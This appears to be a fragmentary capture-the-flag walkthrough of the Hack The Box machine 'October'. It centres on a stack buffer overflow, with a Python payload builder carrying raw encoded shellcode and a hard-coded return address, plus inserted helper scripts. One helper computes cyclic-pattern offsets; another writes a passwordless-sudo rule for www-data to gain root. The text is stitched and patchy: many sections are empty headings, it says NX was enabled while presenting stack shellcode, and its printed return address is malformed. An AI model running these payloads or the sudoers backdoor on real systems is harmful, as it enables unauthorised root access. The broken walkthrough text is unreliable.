October — HTB Walkthrough

ENUMERATION

Port 80 HTTP Enumeration

Visiting the website, I found a login page and a register page.
A backend folder was also found.
Auth page
We see that we can upload malicious content using any of these.

EXPLOITATION

Getting a shell as www-data
Getting user.txt

PRIVILEGE ESCALATION

On the target machine
On your machine
We receive a segmentation fault at 0x64413764, a value that comes from the cyclic pattern we sent.
Looking this value up in the pattern places it at offset 112.
Checking the value in the EIP register, we see it is filled with Bs, which confirms the offset.
It hits.

4) Shellcode

5) Sending payload

We see that EIP is overwritten with As.
The payload builder, written out as a script rather than the page's python -c one-liner (Python 2 string semantics, so "\x90" is a byte):

# Build the payload: NOP sled + shellcode + return address, with the
# return address starting exactly at offset 112.
offset = 112
shell = ""
shell += "\xdb\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf\xff\xee\x16"
shell += "\x49\x83\xee\xfc\x31\x7e\x13\x03\x81\xfd\xf4\xbc\x4c\xd9\x0e"
shell += "\xdd\xfd\x9e\xa3\x48\x03\xa8\xa5\x3d\x65\x67\xa5\xad\x30\xc7"
shell += "\x99\x1c\x42\x6e\x9f\x67\x2a\x7b\x55\x96\xba\x13\x6b\xa6\xab"
shell += "\xbf\xe2\x47\x7b\x59\xa5\xd6\x28\x15\x46\x50\x2f\x94\xc9\x30"
shell += "\xc7\x49\xe5\xc7\x7f\xfe\xd6\x08\x1d\x97\xa1\xb4\xb3\x34\x3b"
shell += "\x70\x39\xd4\xbf"                   # 94 bytes of encoded shellcode
nop = "\x90" * (offset - len(shell))          # 18-byte sled so EIP lands at 112
# Return address exactly as printed on the page. Note that Python reads "\xe4c"
# as the byte \xe4 followed by the letter c, giving five bytes instead of four,
# so check this value against your own debugger output before relying on it.
eip = "\xe4c\xfd\x95\xbf"
payload = nop + shell + eip
print(payload)
ASLR was enabled.
NX was enabled, so the stack is not executable and shellcode placed there will not run as-is.
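The pattern lookup and payload layout above, as an added example that is not part of the original walkthrough: it reproduces what pattern_create and pattern_offset do, showing why the crash value 0x64413764 maps to offset 112, and builds the NOP-sled + shellcode + EIP layout with size checks. The shellcode and return address in it are constructed stand-ins, not the page's values.

```python
# Added example (not the walkthrough's own code): reproduce the pattern_create /
# pattern_offset step that turns the crash value 0x64413764 into offset 112, and
# the NOP-sled + shellcode + EIP layout of the payload builder above.
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...Aa9Ab0...) cut to `length` chars."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]   # pattern exhausted (max 20280 chars)


def pattern_offset(crash_value, length=5000):
    """Offset of the bytes that landed in EIP inside the pattern, or -1 if absent.

    An x86 EIP value such as 0x64413764 is the little-endian view of the four
    pattern bytes "d7Ad", so an integer is unpacked as '<I' before searching.
    """
    if isinstance(crash_value, int):
        needle = struct.pack("<I", crash_value).decode("ascii", errors="replace")
    else:
        needle = crash_value
    return pattern_create(length).find(needle)


def build_payload(shellcode, ret_addr, offset, nop=b"\x90"):
    """NOP sled + shellcode + return address, sized so the return address starts
    exactly at `offset` (the layout of the page's payload builder)."""
    if len(shellcode) > offset:
        raise ValueError("shellcode (%d bytes) does not fit before EIP at %d"
                         % (len(shellcode), offset))
    sled = nop * (offset - len(shellcode))
    return sled + shellcode + struct.pack("<I", ret_addr)


# Constructed stand-in for the page's 94-byte encoded shellcode: 0xCC (int3)
# so a debugger stops immediately if the sled is ever reached.
SAMPLE_SHELLCODE = b"\xcc" * 94
SAMPLE_RET = 0xbffff3a0   # placeholder stack address, not a value from the page


def demo():
    """Offset recovered from the crash value, and the resulting payload length."""
    offset = pattern_offset(0x64413764)               # -> 112
    payload = build_payload(SAMPLE_SHELLCODE, SAMPLE_RET, offset)
    return offset, len(payload)                       # -> (112, 116)


if __name__ == "__main__":
    print(demo())
```

With ASLR and NX both on, this layout is only the skeleton: the sled and shellcode would not execute from the stack, and the return address changes on every run, so the address has to point into existing code and be recomputed or brute-forced rather than hard-coded.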

Calculation

Getting ROOT Flag

POST EXPLOITATION

Since we have the privilege to open and modify a file as root, we add ourselves to /etc/sudoers so that we can run sudo without a password, and then switch to root with sudo su. Be careful here: a syntax error in /etc/sudoers disables sudo for every user, so check the file with visudo -c (or keep to a drop-in under /etc/sudoers.d) rather than editing it blind.
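The sudoers edit described above, as an added example that is not part of the original walkthrough: it writes the NOPASSWD rule idempotently and atomically, sets the 0440 mode sudo expects, and runs the file through visudo -cf before it is trusted. The file path and the check_syntax helper are this example's own; visudo is only assumed to be present for the syntax check.

```python
# Added example (not the walkthrough's own code): grant a user passwordless sudo
# the way the step above describes, written so a typo cannot lock sudo out.
# Assumes a POSIX host; `visudo` is optional and only used for the syntax check.
import os
import re
import shutil
import subprocess

USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def nopasswd_rule(user):
    """The sudoers line the walkthrough adds; refuses names that would change
    the grammar of the line (spaces, '#', uppercase keywords such as ALL)."""
    if not USERNAME_RE.fullmatch(user):
        raise ValueError("not a plain username: %r" % (user,))
    return "%s ALL=(ALL) NOPASSWD: ALL" % user


def add_rule(path, user):
    """Write the rule once (idempotent) via an atomic replace and leave the file
    in the 0440 mode sudo expects. Returns the resulting file content."""
    rule = nopasswd_rule(user)
    lines = []
    if os.path.exists(path):
        with open(path) as f:
            lines = f.read().splitlines()
    if rule not in lines:
        lines.append(rule)
    content = "\n".join(lines) + "\n"
    tmp = path + ".tmp"
    with open(tmp, "w") as f:
        f.write(content)
    os.chmod(tmp, 0o440)
    os.replace(tmp, path)      # atomic: sudo never sees a half-written file
    return content


def check_syntax(path):
    """`visudo -cf FILE` parses the file without installing it. Returns True or
    False, or None when visudo is not on PATH. Never skip this on the real
    /etc/sudoers: a syntax error there disables sudo for every user."""
    if shutil.which("visudo") is None:
        return None
    result = subprocess.run(["visudo", "-cf", path],
                            stdout=subprocess.DEVNULL,
                            stderr=subprocess.DEVNULL)
    return result.returncode == 0


def demo():
    """Run against a temporary file so nothing on the host is touched."""
    import tempfile
    path = os.path.join(tempfile.mkdtemp(), "10-www-data")
    first = add_rule(path, "www-data")
    second = add_rule(path, "www-data")       # idempotent: no duplicate line
    mode = os.stat(path).st_mode & 0o777
    return first, second, mode, check_syntax(path)


if __name__ == "__main__":
    print(demo())
```

On a host whose /etc/sudoers includes /etc/sudoers.d, pointing add_rule at a file in that directory is the safer choice, since a broken drop-in is easier to remove than a broken main file; names there must not contain a dot or end in a tilde, or sudo silently ignores them.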

Dhanishtha Awasthi
OSCP | CEH | Cyber Security Enthusiast.